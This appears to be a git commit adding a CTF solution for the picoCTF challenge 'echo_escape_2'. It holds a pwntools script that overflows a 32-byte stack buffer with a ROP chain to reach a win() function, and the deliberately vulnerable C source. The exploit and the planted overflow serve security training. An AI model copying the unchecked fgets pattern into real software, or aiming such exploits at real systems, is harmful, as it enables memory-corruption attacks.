pwn/echo_escape_2
This commit is contained in:
@@ -0,0 +1 @@
|
||||
picoCTF{dummy}
|
||||
Executable
+33
@@ -0,0 +1,33 @@
|
||||
#!/usr/bin/env nix-shell
|
||||
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
|
||||
|
||||
from pwn import *
|
||||
|
||||
exe = ELF("./vuln")
|
||||
|
||||
context.binary = exe
|
||||
|
||||
ADDR, PORT, *_ = "dolphin-cove.picoctf.net 56430".split()
|
||||
|
||||
def conn():
|
||||
if args.REMOTE:
|
||||
r = remote(ADDR, PORT)
|
||||
else:
|
||||
r = process([exe.path])
|
||||
|
||||
return r
|
||||
|
||||
def main():
|
||||
r = conn()
|
||||
r.recvuntil(b'Enter the secret key: ').decode()
|
||||
|
||||
offset = 0x2C
|
||||
rop = ROP(exe)
|
||||
rop.raw(rop.generatePadding(0, offset))
|
||||
rop.win()
|
||||
r.sendline(rop.chain())
|
||||
print(r.recvline_contains(b'picoCTF').decode())
|
||||
r.close()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,34 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
void win() {
|
||||
FILE *fp = fopen("flag.txt", "r");
|
||||
if (!fp) {
|
||||
perror("[!] Could not open flag.txt");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
char flag[128];
|
||||
fgets(flag, sizeof(flag), fp);
|
||||
printf("Flag: %s\n", flag);
|
||||
fflush(stdout);
|
||||
fclose(fp);
|
||||
}
|
||||
|
||||
void vuln() {
|
||||
char buf[32];
|
||||
|
||||
printf("Enter the secret key: ");
|
||||
fflush(stdout);
|
||||
|
||||
fgets(buf, 128, stdin);
|
||||
|
||||
printf("You entered:, %s\n", buf);
|
||||
}
|
||||
|
||||
int main() {
|
||||
vuln();
|
||||
puts("Goodbye!");
|
||||
return 0;
|
||||
}
|
||||
Reference in New Issue
Block a user